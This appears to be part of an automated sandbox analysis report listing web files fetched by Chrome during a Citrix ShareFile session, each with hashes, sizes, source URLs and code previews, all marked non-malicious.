                                                                                                                                                                                                                      MD5:114E798D503A347AAB2A537702E1593F
                                                                                                                                                                                                                      SHA1:EDC8A8C19A54D81944F8EA870D826E06A7362161
                                                                                                                                                                                                                      SHA-256:091AB89F90FE0DBAEDE5C8C9C5308C702C75D49A9CD809CECB9F001F98788C38
                                                                                                                                                                                                                      SHA-512:06CE751BE294ABF4D171F9A9BA070FEBB75A29E45615125F3AD8E9D1905A8484E990CB7CD97092F2953E3FBF1596B4617933FF85C3EA74F40C5FB94237E80DC3
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-task-mgt-pilet/1.7.0/package/dist/index.js
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevtaskmgtpilet,{}).System.register(["@sharefiledev/antd-config","antd","react","react-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={};return Object.defineProperty(o,"__esModule",{value:!0}),Object.defineProperty(i,"__esModule",{value:!0}),{setters:[function(e){n.sizes=e.sizes},function(e){r.Alert=e.Alert,r.Button=e.Button,r.Card=e.Card,r.Col=e.Col,r.Divider=e.Divider,r.Empty=e.Empty,r.Flex=e.Flex,r.Input=e.Input,r.Layout=e.Layout,r.Menu=e.Menu,r.Popconfirm=e.Popconfirm,r.Result=e.Result,r.Row=e.Row,r.Select=e.Select,r.Skeleton=e.Skeleton,r.Space=e.Space,r.Spin=e.Spin,r.Tabs=e.Tabs,r.Typography=e.Typography,r.theme=e.theme},function(e){Object.keys(e).forEach((function(t){o[t]=e[t]}))},function(e){Object.keys(e).forEach((function(t){i[t]=e[t]}))},function(e){a.__assign=e.__assign,a.__awaiter=e.__awaiter,a.__generator=e.__generator,a.__makeTemplateObject=e.__makeTemplateObject,a.__spreadArray=e.__spreadArray}],execute:function(){e((()=>{var
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65479)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):167028
                                                                                                                                                                                                                      Entropy (8bit):5.295519979527004
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3072:Ze10ed17nqzxppbm/Lgh1aaZV0YYLAbafAbKcPu4TlhV4i:4Cs17nqzxppbsAbaIbKyu4h
                                                                                                                                                                                                                      MD5:D415917C44EDB49D2128CF696D92474C
                                                                                                                                                                                                                      SHA1:C97E2316EDEC31A6E56CF0C7DA7A61EDF8CDF316
                                                                                                                                                                                                                      SHA-256:6ECF8E88C098C14C975873C9EDC0C842F5FC17B03B2FB52291DCE1266F23C124
                                                                                                                                                                                                                      SHA-512:68D8A8DAEA2810E490FDD1A33499BCC0277971A264C436EA94D2EF55A52708D7422470370333615827D044211F5DBE26C673C5B2A0B5B9E897DB98E66F20FE55
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-rubicon-pilet/0.33.5/package/dist/index.js
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevrubiconpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},i={},o={},s={},a={},u={},c={};return Object.defineProperty(o,"__esModule",{value:!0}),Object.defineProperty(c,"__esModule",{value:!0}),{setters:[function(e){n.UserRole=e.UserRole},function(e){r.sizes=e.sizes},function(e){i.Alert=e.Alert,i.App=e.App,i.Button=e.Button,i.Carousel=e.Carousel,i.Checkbox=e.Checkbox,i.Col=e.Col,i.Divider=e.Divider,i.Drawer=e.Drawer,i.Flex=e.Flex,i.Form=e.Form,i.Grid=e.Grid,i.Image=e.Image,i.Input=e.Input,i.Layout=e.Layout,i.List=e.List,i.Menu=e.Menu,i.Modal=e.Modal,i.Popconfirm=e.Popconfirm,i.Result=e.Result,i.Row=e.Row,i.Skeleton=e.Skeleton,i.Space=e.Space,i.Spin=e.Spin,i.Tag=e.Tag,i.Tooltip=e.Tooltip,i.Typography=e.Typography,i.theme=e.theme},function(e){Object.keys(e).forEach((function(t){o[t]=e[t]}))},function(e){s.createPortal=e.createPort
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65474)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):199512
                                                                                                                                                                                                                      Entropy (8bit):5.361186797681031
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3072:Hcw12O6Q3jpptl874SyaDlInKIIbQxkLh1Qkr/:8wkOLjpptlm4Sy3KVb/N
                                                                                                                                                                                                                      MD5:38596D901C05CDCB1B7DB1F4D6D21BA7
                                                                                                                                                                                                                      SHA1:8A86524AAEE7B7462081A6A3C6F9FBCF6174C80A
                                                                                                                                                                                                                      SHA-256:159C798B7CB0A3F271E179FBFF2D2862394D1F2832F248D6F71802C7F253C04E
                                                                                                                                                                                                                      SHA-512:3FFB8DF04864002AE61D41DCF30B55BDBB3285E0843425EDDD0BFB2258CEA89FE540123F98F5B896673C3E41A5D096123E87BB6E519FD3B8639C10438ABD9D7D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-entitlements-pilet/0.1.54/package/dist/index.js
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledeventitlementspilet,{}).System.register(["@sharefiledev/antd-config","antd","react","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={};return Object.defineProperty(o,"__esModule",{value:!0}),{setters:[function(e){n.sizes=e.sizes},function(e){r.Alert=e.Alert,r.Button=e.Button,r.Card=e.Card,r.Col=e.Col,r.Divider=e.Divider,r.Flex=e.Flex,r.Image=e.Image,r.Layout=e.Layout,r.Row=e.Row,r.Skeleton=e.Skeleton,r.Space=e.Space,r.Spin=e.Spin,r.Typography=e.Typography,r.notification=e.notification,r.theme=e.theme},function(e){Object.keys(e).forEach((function(t){o[t]=e[t]}))},function(e){i.useHistory=e.useHistory,i.useLocation=e.useLocation},function(e){a.__awaiter=e.__awaiter,a.__rest=e.__rest}],execute:function(){e((()=>{var e,s,u,c,l={439:(e,t,n)=>{"use strict";n.d(t,{z1:()=>k,cM:()=>y});var r=n(2456),o=n(6250),i=2,a=.16,s=.05,u=.05,c=.15,l=5,f=4,d=[{index:7,opacity:.15},{index:6,opacity:.25},{index:5,opacity:.3},{index:5,opacity:.45},{in
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (28011)
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):28069
                                                                                                                                                                                                                      Entropy (8bit):5.532025298172219
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:ibSGxaN+eO1dJ9IB9s8uKG+wws5M9XgY/000h:iRIkumcai9wY/0
                                                                                                                                                                                                                      MD5:53988D5B050BD0E958BB6C2C66BD557F
                                                                                                                                                                                                                      SHA1:3ED52ADA6D03A19F5DC25E762C78806CF8F9360B
                                                                                                                                                                                                                      SHA-256:70E565B136C1CA7347B576839FEED9474EAB6A4999BB67AFA81B1F221239F1CA
                                                                                                                                                                                                                      SHA-512:1582A78BC2E157509F48AC6E84784A186438A44B9EA1A0D9525882102D1B14E463E1E796A18B63C3E29E79D50A0CF7E55E47BEF8BD79289F49CE706405D60F05
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevidentitypilet,{}).System.register(["@sharefiledev/antd-config","antd","react","tslib"],(function(e,t){var r={},n={},a={},o={};return{setters:[function(e){r.colorPalette=e.colorPalette},function(e){n.Alert=e.Alert,n.Button=e.Button,n.Checkbox=e.Checkbox,n.Col=e.Col,n.Divider=e.Divider,n.Drawer=e.Drawer,n.Flex=e.Flex,n.Form=e.Form,n.Input=e.Input,n.Modal=e.Modal,n.Row=e.Row,n.Space=e.Space,n.Spin=e.Spin,n.Tag=e.Tag,n.Tooltip=e.Tooltip,n.Typography=e.Typography,n.notification=e.notification,n.theme=e.theme},function(e){a.Children=e.Children,a.Fragment=e.Fragment,a.createContext=e.createContext,a.createElement=e.createElement,a["default"]=e["default"],a.forwardRef=e.forwardRef,a.isValidElement=e.isValidElement,a.useContext=e.useContext,a.useEffect=e.useEffect,a.useRef=e.useRef,a.useState=e.useState,a.version=e.version},function(e){o.__awaiter=e.__awaiter,o.__rest=e.__rest}],execute:function(){e((()=>{var e,i,l,c,f={481:(e,t,r)=>{"use strict";r.d(t,{r
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65476)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):120056
                                                                                                                                                                                                                      Entropy (8bit):5.389199436611293
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:U3FJRzEx4rBOGmq+JGwODToqWj4hWt2M2T2cWEdOFK:fxc2OnFk4X4K
                                                                                                                                                                                                                      MD5:33040C25DCD11460D4FCAF829905E8BD
                                                                                                                                                                                                                      SHA1:9FF06962F665FF8F73E63B2334A33ADC5A8CE22A
                                                                                                                                                                                                                      SHA-256:044AAAC4452227A53E27DED5C4B3314735974E392E836D2D0489712B0BDD8AF7
                                                                                                                                                                                                                      SHA-512:0C2E4169A77DA124DD18423441B698693526940DA0E75A1732298CDEF3F6FC532B754358880F6997A850310A6B3EA66A80BFCE56D313388645F2A1B25A9D6CF5
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-view-engine-pilet/1.24.0/package/dist/index.js
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevviewenginepilet,{}).System.register(["@sharefiledev/antd-config","antd","react","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={},s={};return Object.defineProperty(o,"__esModule",{value:!0}),{setters:[function(e){n.sizes=e.sizes},function(e){r.Alert=e.Alert,r.Badge=e.Badge,r.Button=e.Button,r.Card=e.Card,r.Checkbox=e.Checkbox,r.Col=e.Col,r.ConfigProvider=e.ConfigProvider,r.DatePicker=e.DatePicker,r.Divider=e.Divider,r.Dropdown=e.Dropdown,r.Empty=e.Empty,r.Flex=e.Flex,r.Form=e.Form,r.Grid=e.Grid,r.Input=e.Input,r.InputNumber=e.InputNumber,r.Layout=e.Layout,r.List=e.List,r.Menu=e.Menu,r.Modal=e.Modal,r.Popconfirm=e.Popconfirm,r.Radio=e.Radio,r.Result=e.Result,r.Row=e.Row,r.Select=e.Select,r.Skeleton=e.Skeleton,r.Slider=e.Slider,r.Space=e.Space,r.Spin=e.Spin,r.Switch=e.Switch,r.Tabs=e.Tabs,r.Tag=e.Tag,r.Tooltip=e.Tooltip,r.Typography=e.Typography,r.theme=e.theme},function(e){Object.keys(e).forEach((function(t){o[
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (28011)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):28069
                                                                                                                                                                                                                      Entropy (8bit):5.532025298172219
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:ibSGxaN+eO1dJ9IB9s8uKG+wws5M9XgY/000h:iRIkumcai9wY/0
                                                                                                                                                                                                                      MD5:53988D5B050BD0E958BB6C2C66BD557F
                                                                                                                                                                                                                      SHA1:3ED52ADA6D03A19F5DC25E762C78806CF8F9360B
                                                                                                                                                                                                                      SHA-256:70E565B136C1CA7347B576839FEED9474EAB6A4999BB67AFA81B1F221239F1CA
                                                                                                                                                                                                                      SHA-512:1582A78BC2E157509F48AC6E84784A186438A44B9EA1A0D9525882102D1B14E463E1E796A18B63C3E29E79D50A0CF7E55E47BEF8BD79289F49CE706405D60F05
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-identity-pilet/1.0.24/package/dist/index.js
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevidentitypilet,{}).System.register(["@sharefiledev/antd-config","antd","react","tslib"],(function(e,t){var r={},n={},a={},o={};return{setters:[function(e){r.colorPalette=e.colorPalette},function(e){n.Alert=e.Alert,n.Button=e.Button,n.Checkbox=e.Checkbox,n.Col=e.Col,n.Divider=e.Divider,n.Drawer=e.Drawer,n.Flex=e.Flex,n.Form=e.Form,n.Input=e.Input,n.Modal=e.Modal,n.Row=e.Row,n.Space=e.Space,n.Spin=e.Spin,n.Tag=e.Tag,n.Tooltip=e.Tooltip,n.Typography=e.Typography,n.notification=e.notification,n.theme=e.theme},function(e){a.Children=e.Children,a.Fragment=e.Fragment,a.createContext=e.createContext,a.createElement=e.createElement,a["default"]=e["default"],a.forwardRef=e.forwardRef,a.isValidElement=e.isValidElement,a.useContext=e.useContext,a.useEffect=e.useEffect,a.useRef=e.useRef,a.useState=e.useState,a.version=e.version},function(e){o.__awaiter=e.__awaiter,o.__rest=e.__rest}],execute:function(){e((()=>{var e,i,l,c,f={481:(e,t,r)=>{"use strict";r.d(t,{r
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65473)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):77544
                                                                                                                                                                                                                      Entropy (8bit):5.226997072902139
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:ZxeqtFeuD00I4prvOSTLzY7xfNQ87+Ynj2TTo86lUxL1ohA84LijsCul3qC/pbNm:Z11ZvFnKxfNQ87+Yw0j4Ghy2Gfylz9
                                                                                                                                                                                                                      MD5:7B642EB641428D924027759152BD26F4
                                                                                                                                                                                                                      SHA1:766963F144406D2019108B5D88F94A5442E8EF14
                                                                                                                                                                                                                      SHA-256:EB209A2C45816EAD1F57DD45FDDA92ECF0B25D8EE874523DE3C0ECA3E7B3C6FE
                                                                                                                                                                                                                      SHA-512:FD7636C1A83F2105EB181341700BAD335744E995764072503F0C7A000DD01AB30E6AC7D04B9EB2C9E83E58B4EA8678BDE582F4157B482BA6FD6A56AE8589C6DF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-conversations-pilet/1.94.10/package/dist/index.js
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevconversationspilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(t,e){var n={},r={},i={},s={},a={},o={},u={},c={};return Object.defineProperty(s,"__esModule",{value:!0}),{setters:[function(t){n.Api=t.Api,n.ItemsEntity=t.ItemsEntity,n.Uploader=t.Uploader,n.UsersEntity=t.UsersEntity,n.ZoneService=t.ZoneService,n.createFile=t.createFile},function(t){r.colorPalette=t.colorPalette,r.sizes=t.sizes},function(t){i.Avatar=t.Avatar,i.Badge=t.Badge,i.Button=t.Button,i.Flex=t.Flex,i.Form=t.Form,i.Grid=t.Grid,i.Input=t.Input,i.Skeleton=t.Skeleton,i.Spin=t.Spin,i.Typography=t.Typography,i.notification=t.notification,i.theme=t.theme},function(t){Object.keys(t).forEach((function(e){s[e]=t[e]}))},function(t){a["default"]=t["default"],a.findDOMNode=t.findDOMNode,a.flushSync=t.flushSync},function(t){o.useHistory=t.useHistory},function(t){u.Link=t.Link,u.useHistory=t
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (65240)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):1807333
                                                                                                                                                                                                                      Entropy (8bit):5.530242831907712
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12288:fy4ADRmWrWPM23XctQto78wJCqNSRVmjSDAE8nz50M3Z31tN3TUOgxGFMaxNTA7a:ay3XctCmjSEEwFPjTnzk71o9yhEp
                                                                                                                                                                                                                      MD5:599A89980A09447AFF755BE20D4EACFD
                                                                                                                                                                                                                      SHA1:39E49E3A2631637C2180E693E0C49B07E92D0864
                                                                                                                                                                                                                      SHA-256:E98ECAB8292858BF3EB41813858007DB8EDABC4E97C88A3F6D38A66458E5B627
                                                                                                                                                                                                                      SHA-512:F7748698A944FCEFB2CECD05A9DC1CBEC7B1197C0223F9210C6B1B068BAFA19078A0F57F415E1E4CF001F620D90231A87414BEF1AA71275EF782E3EA60A71BE5
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-doc-gen-pilet/1.2.105/package/dist/index.js
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevdocgenpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(__WEBPACK_DYNAMIC_EXPORT__,__system_context__){var __WEBPACK_EXTERNAL_MODULE__8222__={},__WEBPACK_EXTERNAL_MODULE__4634__={},__WEBPACK_EXTERNAL_MODULE__4876__={},__WEBPACK_EXTERNAL_MODULE__4726__={},__WEBPACK_EXTERNAL_MODULE__1867__={},__WEBPACK_EXTERNAL_MODULE__2965__={},__WEBPACK_EXTERNAL_MODULE__8109__={};return Object.defineProperty(__WEBPACK_EXTERNAL_MODULE__4726__,"__esModule",{value:!0}),{setters:[function(e){__WEBPACK_EXTERNAL_MODULE__8222__.AccountsEntity=e.AccountsEntity,__WEBPACK_EXTERNAL_MODULE__8222__.Api=e.Api,__WEBPACK_EXTERNAL_MODULE__8222__.ContactListType=e.ContactListType,__WEBPACK_EXTERNAL_MODULE__8222__.ContactsEntity=e.ContactsEntity,__WEBPACK_EXTERNAL_MODULE__8222__.CustomWorkflowBundleType=e.CustomWorkflowBundleType,__WEBPACK_EXTERNAL_MODULE__8222__.FileVirusStatus=e.FileVirusStatu
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):19
                                                                                                                                                                                                                      Entropy (8bit):3.6818808028034042
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:uZuUeZn:u5eZn
                                                                                                                                                                                                                      MD5:595E88012A6521AAE3E12CBEBE76EB9E
                                                                                                                                                                                                                      SHA1:DA3968197E7BF67AA45A77515B52BA2710C5FC34
                                                                                                                                                                                                                      SHA-256:B16E15764B8BC06C5C3F9F19BC8B99FA48E7894AA5A6CCDAD65DA49BBF564793
                                                                                                                                                                                                                      SHA-512:FD13C580D15CC5E8B87D97EAD633209930E00E85C113C776088E246B47F140EFE99BDF6AB02070677445DB65410F7E62EC23C71182F9F78E9D0E1B9F7FDA0DC3
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview:404 page not found.
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65475)
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):261475
                                                                                                                                                                                                                      Entropy (8bit):5.454849456214367
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3072:iShvOcJT0sAGy2JXeKisbEaAAjWrIQhyzXxV41uIV/9Hs2Z4tPVYuf4B:iSxOrsAGy2JXuAFV4JV/B4FVYj
                                                                                                                                                                                                                      MD5:48252B007677ADFABB0EA62C8028A30E
                                                                                                                                                                                                                      SHA1:09B5B74B71F55FAFF7EE55E44CF4ED5FA01162D2
                                                                                                                                                                                                                      SHA-256:FA747E224CA94227FD110B638E6D45E1AAAD1C38E8CDCB18FDF1035EAB8C018C
                                                                                                                                                                                                                      SHA-512:BC054C876647F042FEFD102F7C884B7ABA0CF8528CB28FC203E0881968FADAA7CC9B664EB7D8D8BFED1783C129D49945D5A1F2511C621AE10DDA729BF7135416
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevrequestlistpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},a={},i={},s={},c={},u={};return Object.defineProperty(a,"__esModule",{value:!0}),Object.defineProperty(u,"__esModule",{value:!0}),{setters:[function(e){n.AccountsEntity=e.AccountsEntity,n.Api=e.Api,n.BundleType=e.BundleType,n.CapabilitiesEntity=e.CapabilitiesEntity,n.CapabilityName=e.CapabilityName,n.ContactListType=e.ContactListType,n.ContactsEntity=e.ContactsEntity,n.CustomWorkflowBundleType=e.CustomWorkflowBundleType,n.DocumentApprovalWorkflowAction=e.DocumentApprovalWorkflowAction,n.EncryptedEmailsEntity=e.EncryptedEmailsEntity,n.ExceptionReason=e.ExceptionReason,n.FileAction=e.FileAction,n.FileLockEntity=e.FileLockEntity,n.FileVirusStatus=e.FileVirusStatus,n.IntegrationProvider=e.IntegrationProvider,n.IntegrationsEntity=e.IntegrationsEntity,n.ItemOperations
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):1099135
                                                                                                                                                                                                                      Entropy (8bit):5.139097520475462
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12288:8B0zR860iF4bCpB0Z89+gvzrHM4I7chPCjP855Znm5JKbnHi8wCZM3i1gK3mBw0b:86zbFxnvxmGAx60UYDYO
                                                                                                                                                                                                                      MD5:20023B7DDB72C21F3595AB2FCBEB5B54
                                                                                                                                                                                                                      SHA1:E4C003EB9252E6342E956ED590F8C61E0C926B0A
                                                                                                                                                                                                                      SHA-256:55D4ADA897F7CDBEEA3C10FC81CBF875C8F4018EF3590EF9A4EDE700BC8836B7
                                                                                                                                                                                                                      SHA-512:961E017A0E68637ADC708A68D350D0410C9AFE868C34A04B72D8FF1252073A8F913ED816130B624E06C3C35753D71B06FD1EC12FF39441F3C60FF3AAABDE4D24
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://0093b71e39a6.11de9b12.us-east-1.token.awswaf.com/0093b71e39a6/478ed03bbf12/challenge.js
                                                                                                                                                                                                                      Preview:var a0_0x49b7=['MAX_AGE_SECONDS','{283807B5-2C60-11D0-A31D-00AA00B92C03}','startDecrypting','signedDataValidator','Could\x20not\x20compute\x20certificate\x20digest.\x20Unknown\x20message\x20digest\x20algorithm\x20OID.','Leftmost\x20octets\x20not\x20zero\x20as\x20expected','PuTTY-User-Key-File-2:\x20','X509\x20CERTIFICATE','getMetrics','__lastWatirPrompt','rsa','6029GpcwZv','collectedData','randomBytes','client\x20finished','forge.setImmediate','Certificate.signatureValue','3DES-CBC','Arno\x20Pro\x20Display','macKey','Garamond\x20Premr\x20Pro','Bradley\x20Hand\x20ITC','srcdoc','AES-ECB','1.2.840.113549.1.9.22.1','no_renegotiation','RC2-64-CBC','client_write_MAC_key','699nNwIod','gain','Certificate.TBSCertificate.validity.notBefore\x20(utc)','prefilled','messageLength64','captchaBlob','forge.pki.CertificateUnknown','generateLocalKeyId','capsEl','1.2.840.113549.3.7','verbose','rsapss','\x22maxline\x22\x20must\x20be\x20a\x20number.','hasOwnProperty','3075734tkrHMH','Encryption\x20block\x20
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65310)
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):510304
                                                                                                                                                                                                                      Entropy (8bit):5.331685296372785
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6144:qF2IodON2KmqE+K/qq/W2mfIyPdOlaEeX05nu+1y0DgFHgJ9biLsjCKa:qF2ON2w3K/qq/W2mf3Ed1y0McbiLlKa
                                                                                                                                                                                                                      MD5:3A34F39BEDF2B38233858CF08BCC1607
                                                                                                                                                                                                                      SHA1:44127288F52A86AEA36B63950C4DF35AB67DDFC7
                                                                                                                                                                                                                      SHA-256:322789B94C5FFF42BB59D43D3329AB3F793E5738A9745317103A56D6856F9C75
                                                                                                                                                                                                                      SHA-512:5D39FF6F20F101AE4EF00F7793189DC6D2AAB0A47774F50DE3D75F0CA2A75BCCF263554F7F206E60E0D6F4E063BDA958C799C758191E24E794A5EBCB41A8C61B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview:// Pendo Agent Wrapper.// Copyright 2024 Pendo.io, Inc..// Environment: production.// Agent Version: 2.253.1.// Installed: 2024-11-05T19:15:28Z.(function (PendoConfig) {./*.@license https://agent.pendo.io/licenses.*/.!function(rw,ow,aw){!function(){var T=Array.prototype.slice;try{T.call(ow.documentElement)}catch(Ut){Array.prototype.slice=function(e,t){if(t=void 0!==t?t:this.length,"[object Array]"===Object.prototype.toString.call(this))return T.call(this,e,t);var n,i=[],r=this.length,o=e||0,a=(t<0?r+t:t||r)-(o=0<=o?o:r+o);if(0<a)if(i=new Array(a),this.charAt)for(n=0;n<a;n++)i[n]=this.charAt(o+n);else for(n=0;n<a;n++)i[n]=this[o+n];return i}}String.prototype.trim||(String.prototype.trim=function(){return this.replace(/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,"")});var A=function(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_".split("");return{uint8ToBase64:function(e){var t,n,i,r=e.length%3,o="";for(t=0,i=e.length-r;t<i;t+=3)n=(e[t]<<16)+(e[t+1]<<8)+e[t+2]
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):13593
                                                                                                                                                                                                                      Entropy (8bit):4.97280201927415
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:TAnCInAOgwRlshkByQhvWAa4nhpI4wRls0rqP+rCW7UCg6YiYBBCW7UC/6YiYiyX:cn3gQh3huEP+rCWUXBBBCWzXBpaVI
                                                                                                                                                                                                                      MD5:79E997CA126B2522CDB04FE90DF21752
                                                                                                                                                                                                                      SHA1:9240FE86112391FE95C34F1E49E26C7FBC2B4722
                                                                                                                                                                                                                      SHA-256:4B3A8A6F91F2F2B51FB6AB816435BD3E3B0C6622D005BA080333F49444083C85
                                                                                                                                                                                                                      SHA-512:F97040E83A072F3385197118C0628C0F24693EF3C2AA98FE1F85DA80AF87A0D36825DD20301FC152E3B67011C1D83A2F08EC96C2785CC8BF54EC0AD0ABB0B2EE
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://citrix-sharefile-content.customer.pendo.io/guide.-323232.1622565221517.css
                                                                                                                                                                                                                      Preview:/* ------------------------------. * -- Main Global Styling -------. * ------------------------------ */...\_pendo-guide\_ {. /* -- Overarching settings for all guides -- */.}...\_pendo-guide-container\_ {. -moz-box-shadow: 1px 1px 1px 0 rgba(0,0,0,0.2);. -webkit-box-shadow: 1px 1px 1px 0 rgba(0,0,0,0.2);..box-shadow: 1px 1px 1px 0 rgba(0,0,0,0.2);. /*padding: 40px 20px;*/. font-family: "citrixsans-regular","CitrixSans",CitrixSansRegular, Arial, sans-serif;.}...\_pendo-guide-container\_ .\_pendo-guide-content\_ {. /* -- Content area -- use for font attributes, padding, etc. */.}...\_pendo-guide-container\_ .\_pendo-guide-content\_ .pendo-header {. font-size: 24px;. .line-height: 31px;. color: #485164;. text-align: center;. .font-family: "citrixsans-semibold","citrixsans-regular","CitrixSans",CitrixSansRegular, Arial, sans-serif;. font-weight:600;. .margin-bottom: 16px;. .padding: 0;.}...\_pendo-guide-container\_ .\_pendo-guide-content\_ .pendo-subheader {. font-s
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65475)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):1036348
                                                                                                                                                                                                                      Entropy (8bit):5.817151661206228
                                                                                                                                                                                                                      Encrypted:false
